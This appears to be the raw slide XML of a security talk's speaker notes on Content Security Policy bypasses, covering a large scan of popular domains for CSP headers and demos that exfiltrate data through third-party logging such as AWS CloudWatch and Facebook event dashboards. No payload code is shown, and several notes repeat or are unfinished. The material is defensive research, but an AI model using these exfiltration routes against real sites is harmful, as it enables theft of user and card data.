        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149901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video we are exfiltrating the secret ingredient instead of exfiltrating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> as I’ve shown before, but the underlying </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this demo I’ve shown the full path of exploitation, from the payload to the XSS exploitation. To save time, the following demos will only show the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>csp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> policy, the payload if it is different from the previous one and the final URL with the payload </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861231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our PoC, instead of default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> *.facebook.com would also work.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860307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our PoC, instead of default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> *.facebook.com would also work.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1357790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method requires the Facebook framework be loaded into the target page. Also, the victim should not have an Ad Blocker, which usually blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> framework and tracking systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159536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that using NPM is also possible and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> would slightly change to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="916910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method requires the Facebook framework be loaded into the target page. Also, the victim should not have an Ad Blocker, which usually blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> framework and tracking systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116655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method requires the Facebook framework be loaded into the target page. Also, the victim should not have an Ad Blocker, which usually blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> framework and tracking systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405166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method requires the Facebook framework be loaded into the target page. Also, the victim should not have an Ad Blocker, which usually blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> framework and tracking systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4198675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1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“CSP is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Speak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>formjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, which affects so many companies dealing with credit card data. An XSS allows criminals to steal forms actions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72849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method requires the Facebook framework be loaded into the target page. Also, the victim should not have an Ad Blocker, which usually blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> framework and tracking systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="984173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investigation to see if the techniques were already being actively used took me even to the deep web, or, also known as the second page of Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I found some of the techniques mentioned in hacker1 reports, such as case X, Y, and Z, but they are not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is worth mentioning that most vulnerabilities to bypass CSP are based in JSONP (JSON with Padding) and AngularJS injection. The techniques I explain here are not using these, but rather a different vector of exfiltration and injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For exfiltration, I take advantage of the logging functionalities that many of these third parties have, such as CloudWatch in Amazon AWS or the Facebook Dashboard where customised events can be seen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For code execution, instead </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19424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investigation to see if the techniques were already being actively used took me even to the deep web, or, also known as the second page of Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I found some of the techniques mentioned in hacker1 reports, such as case X, Y, and Z, but they are not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is worth mentioning that most vulnerabilities to bypass CSP are based in JSONP (JSON with Padding) and AngularJS injection. The techniques I explain here are not using these, but rather a different vector of exfiltration and injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For exfiltration, I take advantage of the logging functionalities that many of these third parties have, such as CloudWatch in Amazon AWS or the Facebook Dashboard where customised events can be seen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For code execution, instead </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066216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Push the button!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1122911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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Seeing attacks and misconfigurations in real time is like  superpower.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2802452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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you need to allow third-party domains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Seeing attacks and misconfigurations in real time is like  superpower.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="12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fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92932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make things worse, CSP has been with us for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>long time. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343637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questioned myself how prevalent is CSP. How many bypasses can I find myself?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352351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Needed to write some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kicker, scale is hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2262788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the end the architecture with which I come was the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The scanning component would be running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jumpbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> facing Internet. I would use asynchronous programming for http library and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pymongo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to store and treat the headers retrieved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A MongoDB database where all the info is stored and processes . In the end the DB size was close to 1.8Gb.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A Dashboard programmed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>plotly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> express and Dash to be able to brose the database and easily spot vulnerabilities to exploit.</a:t>
            </a:r>
          </a:p>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fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44684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Majestic Million is an alternative to Alexa top 1M, which stopped being public in 2016. This set comes from Majestic, a company specialised in SEO. It updates the list frequently and keep track of the most backlinked domains of internet. So, this could be considered a list of domains sorted by Internet popularity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cisco Umbrella, on the other side, pulls their data from the formerly OpenDNS servers. Therefore, the domains that their list contain also contains subdomains of popular companies, hence, making this list significantly different from the previous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I ran the scan twice, once for each data set, and only a few differences arose, which in this case is the usage of CSP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097059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Effort to design one, effort to maintain, things can go wrong and your page studently looks awful (no more CSS), third parties can change their hosts and domains and your page can stop being functional. It requires some preparation time (CSP – RO). Cost money.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94221CE4-CA08-4613-BC43-F2342EFC7CD4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
